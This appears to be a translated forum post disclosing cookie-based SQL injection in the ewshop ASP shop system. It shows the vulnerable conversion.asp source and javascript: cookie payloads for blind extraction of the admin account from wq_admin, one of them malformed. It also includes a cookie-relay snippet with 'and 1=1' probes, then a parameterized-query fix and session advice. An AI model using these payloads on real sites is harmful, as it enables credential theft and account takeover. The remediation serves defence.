The following is the code for the conversion.asp page; many other pages in the system have the same problem.
<!--#include file="conn.asp"-->
<!--#include file="webconfig.asp"-->
<%
if request.cookies("cnhww")("username")="" then
    response.redirect "user.asp"
    response.end
end if
set cnhw=server.createObject("adodb.recordset")
' the cookie value is concatenated straight into the SQL: this is the injection point
cnhw.open "select * from [wq_user] where username=" & request.cookies("cnhww")("username") & "", conn, 1, 3
jf=cnhw("jifen")
yc=cnhw("yucun")
action=request("act")
if action="jifen" then
    jifen=trim(request("jifen"))
    if not isInteger(jifen) then
        response.write "<script>alert(""illegal conversion result!"");history.go(-1);</script>"
    elseif jf-jifen<0 then
        response.write "<script>alert(""Sorry, insufficient points!"");history.go(-1);</script>"
    else
        cnhw("jifen")=jf-jifen
        cnhw("yucun")=yc+(jifen/2)
        cnhw.update
        response.redirect "user.asp"
    end if
end if
if action="cunkuan" then
    cunkuan=trim(request("cunkuan"))
    if not isInteger(cunkuan) then
        response.write "<script language=javascript>alert(""illegal conversion result!"");history.go(-1);</script>"
    elseif yc-cunkuan<0 then
        response.write "<script language=javascript>alert(""Sorry, your deposit is insufficient!"");history.go(-1);</script>"
    else
        cnhw("jifen")=jf+(cunkuan*2)
        cnhw("yucun")=yc-cunkuan
        cnhw.update
        response.redirect "user.asp"
    end if
end if
%>
The username in the code is the registered user name, read from the cookie. It is substituted into the query without any filtering. The administrator table is wq_admin, the user name field is admin, and the password field is password.
Exploitation method: first register a user, such as joker. Injection method, taking guessing the administrator account as an example:
javascript:alert(document.cookie="cnhww=username="+escape("Joker and (select top 1 asc(mid(admin,1,1)) from wq_admin)=97 and 1=1")) // the first
javascript:alert(document.cookie="cnhww=username="+escape("Joker and (select top 1 asc(mid(admin,100) from wq_admin)= and 1=1")) // the second
.....
Finally, I got an account, and the password was a little troublesome: it was 16-bit MD5 encryption.
The injection here is very troublesome, and I couldn't think of any other method. Alas, this is the sorrow of a newbie. It would be nice if someone could write a tool.
Another method: didn't Lonely Hedgehog write a piece of intermediate code for submitting cookies? Fill in the relevant information:
JmStr="cnhww=username=" & JmdcwName
JMUrl="http://127.0.0.1/ewshop/conversion.asp"
JmRef="http://127.0.0.1/ewshop/conversion.asp"
JmCok="ASPSESSIONIDAQACTAQB=HKFHJOPDOMAIKGMPGBJJDKLJ;"
JmCok=JmCok & ";" & JmStr & ";"
JmCok=URLEncoding(JmCok)
JmStr="jmdcw=Joker"
......
After construction, accessing http://127.0.0.1/jmcook.asp?jmdcw=joker is normal,
accessing http://127.0.0.1/jmcook.asp?jmdcw=joker and 1=1 is normal,
accessing http://127.0.0.1/jmcook.asp?jmdcw=joker and 1=2 is abnormal.
--------------------------------------------------------------------------------------------
I read the source code again and found that the system is full of vulnerabilities.
The shangpingtj.asp page can be injected directly.
Solution:
You don't have to fix it. Just replace the system.
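For anyone who keeps the code anyway, the lookup at the top of conversion.asp is the part that has to change: the cookie value must reach the database as a bound parameter, never as text spliced into the SQL string. The block below is an added example written for this page, not code from the original post or from the ewshop project. It assumes the same conn object from conn.asp and the same wq_user table and columns as the vulnerable page; the parameter size of 50 is an assumed column width.

```asp
<%
' Added example (not from the original post or from ewshop): the same user
' lookup with the cookie value bound as a parameter instead of concatenated.
' Assumes "conn" from conn.asp and the wq_user table used by the vulnerable page.
Dim uname, cmd, rs
uname = Request.Cookies("cnhww")("username")

' Reject an empty cookie before touching the database
If uname = "" Then
    Response.Redirect "user.asp"
    Response.End
End If

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
' "?" is the placeholder; the value is sent as data and is never parsed as SQL
cmd.CommandText = "SELECT jifen, yucun FROM [wq_user] WHERE username = ?"
cmd.CommandType = 1   ' adCmdText
' adVarWChar = 202, adParamInput = 1, size 50 is an assumed column width
cmd.Parameters.Append cmd.CreateParameter("username", 202, 1, 50, uname)
Set rs = cmd.Execute

' An unknown name in the cookie is treated as "not logged in", not as an error page
If rs.EOF Then
    Response.Redirect "user.asp"
    Response.End
End If

jf = rs("jifen")
yc = rs("yucun")
%>
```

Parameterizing the query closes the injection described above, but not the second problem visible in the same code: the page trusts a plain username in a client-set cookie as proof of identity, so anyone who can set the cookie can act as another user. The identity should come from a server-side session established at login, and the points and deposit updates further down should be done in the same request against that verified user rather than against whatever name the browser sent.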